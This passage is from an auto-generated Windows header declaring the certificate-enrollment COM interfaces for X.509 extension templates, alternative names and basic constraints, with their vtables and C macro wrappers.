            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplate * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateOid )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MajorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateVtbl;

    interface IX509ExtensionTemplate
    {
        CONST_VTBL struct IX509ExtensionTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplate_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplate_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplate_InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion) ) 

#define IX509ExtensionTemplate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_TemplateOid(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateOid(This,ppValue) ) 

#define IX509ExtensionTemplate_get_MajorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MajorVersion(This,pValue) ) 

#define IX509ExtensionTemplate_get_MinorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MinorVersion(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplate_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0019 */
/* [local] */ 

typedef 
enum AlternativeNameType
    {	XCN_CERT_ALT_NAME_UNKNOWN	= 0,
	XCN_CERT_ALT_NAME_OTHER_NAME	= 1,
	XCN_CERT_ALT_NAME_RFC822_NAME	= 2,
	XCN_CERT_ALT_NAME_DNS_NAME	= 3,
	XCN_CERT_ALT_NAME_DIRECTORY_NAME	= 5,
	XCN_CERT_ALT_NAME_URL	= 7,
	XCN_CERT_ALT_NAME_IP_ADDRESS	= 8,
	XCN_CERT_ALT_NAME_REGISTERED_ID	= 9,
	XCN_CERT_ALT_NAME_GUID	= 10,
	XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME	= 11
    } 	AlternativeNameType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0019_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0019_v0_0_s_ifspec;

#ifndef __IAlternativeName_INTERFACE_DEFINED__
#define __IAlternativeName_INTERFACE_DEFINED__

/* interface IAlternativeName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab313-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromString( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromRawData( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromOtherName( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_StrValue( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IAlternativeNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeName * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromString )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromRawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromOtherName )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_StrValue )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IAlternativeNameVtbl;

    interface IAlternativeName
    {
        CONST_VTBL struct IAlternativeNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IAlternativeName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeName_InitializeFromString(This,Type,strValue)	\
    ( (This)->lpVtbl -> InitializeFromString(This,Type,strValue) ) 

#define IAlternativeName_InitializeFromRawData(This,Type,Encoding,strRawData)	\
    ( (This)->lpVtbl -> InitializeFromRawData(This,Type,Encoding,strRawData) ) 

#define IAlternativeName_InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped)	\
    ( (This)->lpVtbl -> InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped) ) 

#define IAlternativeName_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IAlternativeName_get_StrValue(This,pValue)	\
    ( (This)->lpVtbl -> get_StrValue(This,pValue) ) 

#define IAlternativeName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IAlternativeName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeName_INTERFACE_DEFINED__ */


#ifndef __IAlternativeNames_INTERFACE_DEFINED__
#define __IAlternativeNames_INTERFACE_DEFINED__

/* interface IAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab314-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeNames : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IAlternativeName *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeNames * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeName *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IAlternativeNames * This);
        
        END_INTERFACE
    } IAlternativeNamesVtbl;

    interface IAlternativeNames
    {
        CONST_VTBL struct IAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeNames_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IAlternativeNames_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IAlternativeNames_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IAlternativeNames_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IAlternativeNames_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IAlternativeNames_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__
#define __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__

/* interface IX509ExtensionAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab315-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAlternativeNames : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternativeNames( 
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAlternativeNames * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeNames *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternativeNames )( 
            __RPC__in IX509ExtensionAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeNames **ppValue);
        
        END_INTERFACE
    } IX509ExtensionAlternativeNamesVtbl;

    interface IX509ExtensionAlternativeNames
    {
        CONST_VTBL struct IX509ExtensionAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAlternativeNames_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAlternativeNames_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAlternativeNames_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAlternativeNames_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAlternativeNames_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAlternativeNames_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAlternativeNames_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAlternativeNames_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAlternativeNames_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAlternativeNames_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAlternativeNames_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAlternativeNames_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionAlternativeNames_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAlternativeNames_get_AlternativeNames(This,ppValue)	\
    ( (This)->lpVtbl -> get_AlternativeNames(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAlternativeNames_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__
#define __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__

/* interface IX509ExtensionBasicConstraints */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionBasicConstraints;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab316-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionBasicConstraints : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PathLenConstraint( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionBasicConstraintsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionBasicConstraints * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in REFIID riid,
